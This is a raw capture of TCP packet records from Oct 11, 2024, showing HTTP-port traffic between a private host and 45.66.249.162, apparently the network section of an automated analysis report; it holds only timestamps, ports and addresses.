                                                                                                                                                              Oct 11, 2024 22:32:41.651321888 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651349068 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.651365995 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651381016 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.651403904 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651443005 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651453972 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.651487112 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.651495934 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651520014 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.651520967 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651554108 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.651561975 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651587963 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.651597023 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651619911 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.651634932 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651654005 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.651664019 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651685953 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.651695967 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651726961 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651726961 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.651765108 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.651767969 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651798010 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.651808977 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651830912 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.651840925 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651866913 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.651875019 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651900053 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.651905060 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651937008 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.651941061 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651968956 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.651978970 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.652004004 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.652008057 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.652036905 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.652064085 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.652070045 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.652080059 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.652110100 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.652113914 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.652143002 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.652156115 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.652175903 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.652193069 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.652209044 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.652215004 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.652242899 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.652250051 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.652278900 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.652282000 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.652312040 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.652318001 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.652344942 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.652350903 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.652378082 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.652386904 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.652412891 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.652415037 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.652446032 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.652451038 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.652479887 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.652491093 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.652512074 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.652527094 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.652544975 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.652549982 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.652578115 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.652589083 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.652611971 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.652618885 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.652645111 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.652658939 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.652687073 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.673698902 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.678677082 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.144072056 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.144171953 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.144186020 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.144198895 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.144210100 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.144222021 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.144223928 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.144232988 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.144246101 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.144258976 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.144270897 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.144273043 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.144273043 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.144283056 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.144284964 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.144306898 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.144325972 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.297817945 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.297843933 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.297856092 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.297873020 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.297884941 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.297899008 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.297904968 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.297907114 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.297910929 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.297921896 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.297929049 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.297970057 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.298024893 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.298069000 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.298079967 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.298091888 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.298103094 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.298111916 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.298118114 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.298122883 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.298130035 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.298132896 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.298151016 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.298161983 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.298162937 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.298172951 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.298177958 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.298187017 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.298197985 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.298206091 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.298209906 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.298235893 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.298254967 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.695678949 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.695698023 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.695710897 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.695729017 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.695740938 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.695750952 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.695749998 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.695761919 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.695774078 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.695785999 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.695792913 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.695804119 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.695816040 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.695823908 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.695827961 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.695848942 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.695866108 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.695868015 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.695899963 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.695945024 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.695956945 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.695967913 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.695977926 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.695987940 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.695991039 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.696000099 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.696003914 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.696034908 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.696062088 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.696095943 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.696100950 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.696111917 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.696136951 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.696176052 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.696187019 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.696203947 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.696213961 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.696219921 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.696224928 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.696235895 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.696239948 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.696249962 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.696257114 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.696260929 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.696283102 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.696310997 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.696331978 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.696343899 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.696353912 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.696363926 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.696369886 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.696374893 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.696396112 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.696413040 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.696672916 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.696682930 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.696687937 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.696719885 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.696732044 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.702394962 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702408075 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702419996 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702460051 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.702460051 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.702471018 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702481985 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702491999 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702491999 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.702498913 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.702503920 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702529907 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.702537060 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702548027 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.702550888 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702562094 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702572107 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702573061 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.702584028 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702591896 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.702615023 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.702677011 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.702698946 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702709913 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702721119 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702730894 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702740908 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.702740908 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702754021 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702764034 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.702764988 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702778101 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702781916 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.702805996 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.702805996 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.702821016 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702827930 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.702832937 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702843904 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702853918 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.702853918 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702867031 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702877045 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702883959 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.702883959 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.702891111 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702908039 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.702908039 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.702944994 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.702944994 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.702963114 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702974081 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702985048 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.702995062 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.703002930 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.703006029 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.703016043 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.703016043 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.703028917 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:42.703036070 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.703036070 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.703051090 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.703051090 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:42.703058958 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:43.149009943 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:43.149049997 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:43.154107094 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:43.154565096 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:43.921972990 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:43.922106028 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:43.922738075 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:43.922790051 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:43.994920015 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:44.000860929 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:44.490479946 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:44.490499973 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:44.490511894 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:44.490552902 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:44.490598917 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:44.492645025 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:44.497590065 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:44.970860004 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:44.970954895 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:44.985265970 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:44.990258932 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.469770908 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.469882965 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:45.674274921 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:45.674329996 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:45.679279089 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.679296970 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.679322958 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.679332018 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.679366112 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.679375887 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.679418087 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:45.679419994 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.679430962 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.679440975 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:45.679450035 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.679460049 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.679474115 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:45.679490089 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:45.679502964 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:45.684031010 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.684046030 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.684083939 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:45.684096098 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.684096098 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:45.684107065 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.684117079 CEST804970745.66.249.162192.168.2.8
